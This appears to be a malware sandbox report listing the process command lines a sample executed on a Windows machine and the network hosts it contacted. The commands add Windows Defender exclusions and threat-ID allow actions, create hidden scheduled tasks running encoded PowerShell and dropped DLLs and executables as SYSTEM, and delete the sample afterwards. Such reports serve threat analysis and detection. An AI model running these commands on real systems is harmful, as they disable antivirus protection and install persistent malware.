"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXmMMWGSr" /SC once /ST 00:54:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXmMMWGSr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXmMMWGSr"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 00:33:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe\" Ty /zHsite_idTXl 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "mRaseIvrfxDtBOYKW"
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe Ty /zHsite_idTXl 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\TRDYCX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\ABWjUqu.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "eGwAoTnpAObQfPU"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\kWMHQKZ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\KXGcMEN.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ArGlQVg.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\uLcyUgC.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 01:49:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll\",#1 /LPsite_idCBc 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FTXCzbcEvROqagNdd"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll",#1 /LPsite_idCBc 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll",#1 /LPsite_idCBc 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 8.8.8.8:53 | mihomeme.info | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| US | 8.8.8.8:53 | operandotwo.com | udp |
| US | 8.8.8.8:53 | shipofdestiny.com | udp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | namemail.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | cu82342.tw1.ru | udp |
| US | 172.67.160.247:443 | operandotwo.com | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| IE | 38.180.21.119:80 | mihomeme.info | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 104.21.32.142:443 | shipofdestiny.com | tcp |
| US | 104.21.32.142:443 | shipofdestiny.com | tcp |
| RU | 176.57.210.144:443 | cu82342.tw1.ru | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | lawyerbuyer.org | udp |
| US | 8.8.8.8:53 | guseman.org | udp |
| US | 104.21.63.71:443 | lawyerbuyer.org | tcp |
| US | 104.21.63.71:443 | lawyerbuyer.org | tcp |
| US | 104.21.80.30:443 | guseman.org | tcp |
| US | 8.8.8.8:53 | d.392391234.xyz | udp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.200.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.21.180.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.210.57.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.63.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.80.21.104.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 22.45.164.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 138.91.171.81:80 | tcp | |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 8.8.8.8:53 | 65.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| DE | 185.172.128.209:80 | tcp | |
| US | 172.67.188.178:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 15.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.182.26.185.in-addr.arpa | udp |
| NL | 185.26.182.122:443 | download.opera.com | tcp |
| US | 104.18.10.89:443 | tcp | |
| US | 52.137.106.217:443 | tcp | |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | tcp | |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.45:80 | tcp | |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| GB | 95.101.143.243:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 243.143.101.95.in-addr.arpa | udp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| IE | 38.180.21.197:80 | tcp | |
| US | 8.8.8.8:53 | 7b03294c-e7ad-4c6b-b472-a303c4562dae.uuid.dumppage.org | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| NL | 82.145.216.20:443 | tcp | |
| NL | 82.145.216.20:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| NL | 82.145.216.15:443 | tcp | |
| US | 8.8.8.8:53 | server8.dumppage.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun3.l.google.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.111:443 | server8.dumppage.org | tcp |
| CH | 172.217.210.127:19302 | stun3.l.google.com | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 127.210.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.94.21.104.in-addr.arpa | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| IE | 38.180.21.197:80 | tcp | |
| BG | 185.82.216.111:443 | server8.dumppage.org | tcp |
| IE | 38.180.21.197:80 | tcp | |
| IE | 38.180.21.197:80 | tcp | |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 121.150.80.3.in-addr.arpa | udp |
